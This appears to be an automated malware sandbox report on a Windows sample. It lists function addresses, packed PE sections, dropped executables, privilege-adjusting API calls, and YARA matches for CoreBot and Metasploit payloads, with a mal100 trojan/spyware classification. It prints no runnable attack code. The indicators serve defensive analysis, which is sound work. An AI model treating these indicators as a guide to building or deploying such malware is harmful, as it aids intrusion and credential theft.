Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00A91F32	0_2_00A91F32
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF251880	27_2_00007FFDFF251880
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF2512F0	27_2_00007FFDFF2512F0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF39C7A0	27_2_00007FFDFF39C7A0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF37E3B0	27_2_00007FFDFF37E3B0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF3713B0	27_2_00007FFDFF3713B0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF3953C0	27_2_00007FFDFF3953C0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF379FD0	27_2_00007FFDFF379FD0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF398760	27_2_00007FFDFF398760
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF392F70	27_2_00007FFDFF392F70
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF375F75	27_2_00007FFDFF375F75
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF373380	27_2_00007FFDFF373380
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF39FF8B	27_2_00007FFDFF39FF8B
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF397B80	27_2_00007FFDFF397B80
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF394420	27_2_00007FFDFF394420
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF396420	27_2_00007FFDFF396420
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF37CC30	27_2_00007FFDFF37CC30
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF389430	27_2_00007FFDFF389430
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF38A040	27_2_00007FFDFF38A040
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF375850	27_2_00007FFDFF375850
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF396FF0	27_2_00007FFDFF396FF0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF3B36D0	27_2_00007FFDFF3B36D0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF399A60	27_2_00007FFDFF399A60
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF372E70	27_2_00007FFDFF372E70
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF372A80	27_2_00007FFDFF372A80
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF374280	27_2_00007FFDFF374280
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF373B20	27_2_00007FFDFF373B20
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF39CF20	27_2_00007FFDFF39CF20
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF399330	27_2_00007FFDFF399330
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF39E71B	27_2_00007FFDFF39E71B
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF37671A	27_2_00007FFDFF37671A
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF393F10	27_2_00007FFDFF393F10
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF376316	27_2_00007FFDFF376316
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF3939B0	27_2_00007FFDFF3939B0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF3975C0	27_2_00007FFDFF3975C0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF39A9D0	27_2_00007FFDFF39A9D0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF387180	27_2_00007FFDFF387180
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF37D190	27_2_00007FFDFF37D190
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF398190	27_2_00007FFDFF398190
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF395E50	27_2_00007FFDFF395E50
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF39A1E0	27_2_00007FFDFF39A1E0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF3969E0	27_2_00007FFDFF3969E0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF390E10	27_2_00007FFDFF390E10
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF3888A0	27_2_00007FFDFF3888A0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF375C63	27_2_00007FFDFF375C63
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF39C070	27_2_00007FFDFF39C070
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF379080	27_2_00007FFDFF379080
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF39B880	27_2_00007FFDFF39B880
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF393480	27_2_00007FFDFF393480
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF380920	27_2_00007FFDFF380920
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF37592C	27_2_00007FFDFF37592C
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF398D20	27_2_00007FFDFF398D20
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF3B3130	27_2_00007FFDFF3B3130
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF371D40	27_2_00007FFDFF371D40
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF394950	27_2_00007FFDFF394950
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF374900	27_2_00007FFDFF374900
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF39B100	27_2_00007FFDFF39B100
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFDFF387D10	27_2_00007FFDFF387D10
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A1D93	27_2_00007FFE004A1D93
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A16FE	27_2_00007FFE004A16FE
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A8720	27_2_00007FFE004A8720
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A116D	27_2_00007FFE004A116D
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE00518870	27_2_00007FFE00518870
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004D8920	27_2_00007FFE004D8920
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A1EE2	27_2_00007FFE004A1EE2
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A1618	27_2_00007FFE004A1618
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A1A0F	27_2_00007FFE004A1A0F
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A2617	27_2_00007FFE004A2617
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE0051AC80	27_2_00007FFE0051AC80
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A149C	27_2_00007FFE004A149C
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A1CBC	27_2_00007FFE004A1CBC
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A1B54	27_2_00007FFE004A1B54
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A117C	27_2_00007FFE004A117C
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A2702	27_2_00007FFE004A2702
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A24DC	27_2_00007FFE004A24DC
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A17F8	27_2_00007FFE004A17F8
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE0050D2D0	27_2_00007FFE0050D2D0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A1C12	27_2_00007FFE004A1C12
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE00513650	27_2_00007FFE00513650
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A21C6	27_2_00007FFE004A21C6
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A1654	27_2_00007FFE004A1654
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A13DE	27_2_00007FFE004A13DE
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004ED980	27_2_00007FFE004ED980
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A1596	27_2_00007FFE004A1596
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004E9A60	27_2_00007FFE004E9A60
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004CBAE0	27_2_00007FFE004CBAE0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004E5C00	27_2_00007FFE004E5C00
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A155A	27_2_00007FFE004A155A
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A21E4	27_2_00007FFE004A21E4
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A1FDC	27_2_00007FFE004A1FDC
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004EDE50	27_2_00007FFE004EDE50
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A1546	27_2_00007FFE004A1546
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A1AD7	27_2_00007FFE004A1AD7
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004C6030	27_2_00007FFE004C6030
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE0242D250	27_2_00007FFE0242D250
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE02429260	27_2_00007FFE02429260
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE024C8260	27_2_00007FFE024C8260
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE02417316	27_2_00007FFE02417316
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE0242C330	27_2_00007FFE0242C330
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE024132D5	27_2_00007FFE024132D5
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE0243D2F0	27_2_00007FFE0243D2F0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE0243F2E0	27_2_00007FFE0243F2E0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE024B6430	27_2_00007FFE024B6430
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE0249A430	27_2_00007FFE0249A430
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE02477420	27_2_00007FFE02477420
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE024BB3C0	27_2_00007FFE024BB3C0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE02414100	27_2_00007FFE02414100
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE0249C0F0	27_2_00007FFE0249C0F0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE02422190	27_2_00007FFE02422190
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE024C5180	27_2_00007FFE024C5180
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE024BE170	27_2_00007FFE024BE170
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE02432210	27_2_00007FFE02432210
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE0249E220	27_2_00007FFE0249E220
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE0E171E90	27_2_00007FFE0E171E90
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE0E172E70	27_2_00007FFE0E172E70
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE0E173970	27_2_00007FFE0E173970
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE0E176640	27_2_00007FFE0E176640
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE0E179A40	27_2_00007FFE0E179A40
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE0E178FA0	27_2_00007FFE0E178FA0

Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: String function: 00A8F9F2 appears 31 times
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: String function: 00A90A30 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: String function: 00007FFE0051D32F appears 327 times
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: String function: 00007FFE0051DB03 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: String function: 00007FFE0051D33B appears 43 times
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: String function: 00007FFE0051D341 appears 1193 times
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: String function: 00007FFE0E171070 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: String function: 00007FFE004A1325 appears 471 times
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: String function: 00007FFE0241A490 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: String function: 00007FFE0051D425 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: String function: 00007FFE02419330 appears 35 times

Source: _overlapped.pyd.24.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.24.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: SvhQA35[1].exe.20.dr	Static PE information: Number of sections : 12 > 10
Source: chromium.exe.24.dr	Static PE information: Number of sections : 12 > 10
Source: SvhQA35.exe.20.dr	Static PE information: Number of sections : 12 > 10

Source: python3.dll.24.dr

Static PE information: No import functions for PE file found

Source: 5c9465cda4.exe, 00000000.00000003.1667855942.0000000000E39000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FV_ORIGINALFILENAMEVK vs 5c9465cda4.exe
Source: 5c9465cda4.exe, 00000000.00000003.1667855942.0000000000E39000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_K vs 5c9465cda4.exe
Source: 5c9465cda4.exe, 00000000.00000003.1668185148.0000000000E40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FV_ORIGINALFILENAMEVK vs 5c9465cda4.exe
Source: 5c9465cda4.exe, 00000000.00000003.1668185148.0000000000E40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_K vs 5c9465cda4.exe
Source: 5c9465cda4.exe, 00000000.00000003.1671848553.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FV_ORIGINALFILENAME vs 5c9465cda4.exe
Source: 5c9465cda4.exe, 00000000.00000003.1672824887.0000000000D02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FV_ORIGINALFILENAME vs 5c9465cda4.exe
Source: 5c9465cda4.exe, 00000000.00000003.1671692050.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FV_ORIGINALFILENAME vs 5c9465cda4.exe
Source: 5c9465cda4.exe, 00000000.00000002.1674499193.0000000000D07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FV_ORIGINALFILENAME vs 5c9465cda4.exe
Source: 5c9465cda4.exe, 00000000.00000003.1672408545.0000000000D02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FV_ORIGINALFILENAME vs 5c9465cda4.exe
Source: 5c9465cda4.exe, 00000000.00000003.1672892274.0000000000D03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FV_ORIGINALFILENAME vs 5c9465cda4.exe
Source: 5c9465cda4.exe, 00000000.00000002.1674855615.0000000000E40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FV_ORIGINALFILENAMEVK vs 5c9465cda4.exe
Source: 5c9465cda4.exe, 00000000.00000002.1674855615.0000000000E40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_K vs 5c9465cda4.exe

Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: 5c9465cda4.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 28.0.ce4pMzk.exe.21039bd3fe8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
Source: 28.0.ce4pMzk.exe.21039bd3fe8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
Source: 28.0.ce4pMzk.exe.21039bd0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
Source: 00000040.00000002.2948533861.000000000DF1E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000040.00000002.2948533861.000000000DEC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000040.00000002.2948533861.000000000DFAE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ce4pMzk[1].exe, type: DROPPED	Matched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe, type: DROPPED	Matched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
Source: C:\Users\user\AppData\Roaming\Local\Caches\08oGp67f\Anubis.exe, type: DROPPED	Matched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212

Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE.5.dr	Static PE information: Section: ZLIB complexity 0.9989131370523416
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE.5.dr	Static PE information: Section: oyvtxmua ZLIB complexity 0.9946532609108881
Source: rapes.exe.10.dr	Static PE information: Section: ZLIB complexity 0.9989131370523416
Source: rapes.exe.10.dr	Static PE information: Section: oyvtxmua ZLIB complexity 0.9946532609108881
Source: random[1].exe0.20.dr	Static PE information: Section: lrekyrul ZLIB complexity 0.9945396019936434
Source: df7baf8347.exe.20.dr	Static PE information: Section: lrekyrul ZLIB complexity 0.9945396019936434
Source: random[1].exe1.20.dr	Static PE information: Section: .CSS ZLIB complexity 1.0003273242728532
Source: a0b9927072.exe.20.dr	Static PE information: Section: .CSS ZLIB complexity 1.0003273242728532

Source: random[1].exe1.20.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: random[1].exe1.20.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: random[1].exe1.20.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: a0b9927072.exe.20.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: a0b9927072.exe.20.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: a0b9927072.exe.20.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@90/107@64/6

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00AE37B5 GetLastError,FormatMessageW,

0_2_00AE37B5

Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AD10BF AdjustTokenPrivileges,CloseHandle,	0_2_00AD10BF
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AD16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_00AD16C3
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE0E177E20 GetCurrentProcess,OpenProcessToken,GetLastError,ImpersonateSelf,OpenProcessToken,GetLastError,PyErr_SetFromWindowsErrWithFilename,LookupPrivilegeValueA,GetLastError,PyErr_SetFromWindowsErrWithFilename,AdjustTokenPrivileges,GetLastError,PyErr_SetFromWindowsErrWithFilename,AdjustTokenPrivileges,RevertToSelf,CloseHandle,	27_2_00007FFE0E177E20

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00AE51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00AE51CD

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00AFA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00AFA67C

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00AE648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_00AE648E

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00A742A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00A742A2

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SvhQA35[1].exe

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6024:120:WilError_03
